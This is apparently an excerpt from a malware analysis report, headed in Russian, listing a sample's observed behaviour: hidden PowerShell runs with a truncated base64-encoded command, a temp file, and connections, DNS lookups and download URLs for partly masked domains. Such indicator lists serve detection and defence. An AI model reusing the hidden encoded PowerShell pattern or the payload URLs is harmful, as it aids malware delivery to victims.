Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHQAbQBmAGYAZQB6AGgAeAB4AHQAeABtAD0AJwBOAHMAYQBoAGIAZwB3AHUAZwByACcAOwAkAFMAdABqAHIAawBkAHUAZwAgAD0AIAAnADcANAAnADsAJABNAGoAaABnAGQAbgBoAHEAYQBhAD0AJwBaAGcAeABsAGsAdQBoAHoAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1212548.cvr
- 'ku##hai.com':80
- 'ku##hai.com':443
- 'ka###nyali.net':80
- http://ku##hai.com/wp-includes/7fslng/
- http://ka###nyali.net/TEST777/unsqe/
- 'ku##hai.com':443
- DNS ASK ku##hai.com
- DNS ASK lo###thai99.com
- DNS ASK ho####koration.site
- DNS ASK ka###nyali.net
- DNS ASK me####fatih.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHQAbQBmAGYAZQB6AGgAeAB4AHQAeABtAD0AJwBOAHMAYQBoAGIAZwB3AHUAZwByACcAOwAkAFMAdABqAHIAawBkAHUAZwAgAD0AIAAnADcANAAnADsAJABNAGoAaABnAGQAbgBoAHEAYQBhAD0AJwBaAGcAeABsAGsAdQBoAHoAJwA...' (со скрытым окном)